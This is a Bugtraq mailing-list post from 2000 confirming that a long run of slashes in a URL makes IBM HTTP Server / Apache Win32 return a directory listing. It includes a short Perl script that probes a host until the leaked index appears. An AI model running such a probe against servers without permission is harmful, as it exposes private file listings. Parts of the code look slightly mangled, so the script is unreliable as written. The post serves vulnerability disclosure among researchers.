Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: IBM HTTP SERVER / APACHE

From: hdm () SECUREAUSTIN COM (H D Moore)
Date: Thu, 1 Jun 2000 09:52:38 -0500

Hi,

I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32).  The
number of /'s needed were exactly the same number as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example perl script for finding _your_ magic number.  Is
this a bug merely in IBM HTTPD or Apache Win32 in general?  Does IBM set
some odd compile flag which triggers this bug in thier version?  Anyone
from the Apache group care to comment?

-HD

http://www.secureaustin.com (spidermap/nlog/etc)

Marek Roy wrote:


I haven't seen any advisories for IBM HTTP SERVER running
Apache.


[ snip ]

The number of "/" used to reproduce this can be different
from one server to another.  I don't have enough time to do
more testing.  However, feel free to add some more info to
this quick advisory.


----[ sample scan script to find / offset ]---- (OMG its PERL ;)

#!/usr/bin/perl

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $;

$odata = get("http://$host/";);
if ($odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host"; . ("/" x $i));
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}
Previous By Date Next
Previous By Thread Next

Current thread: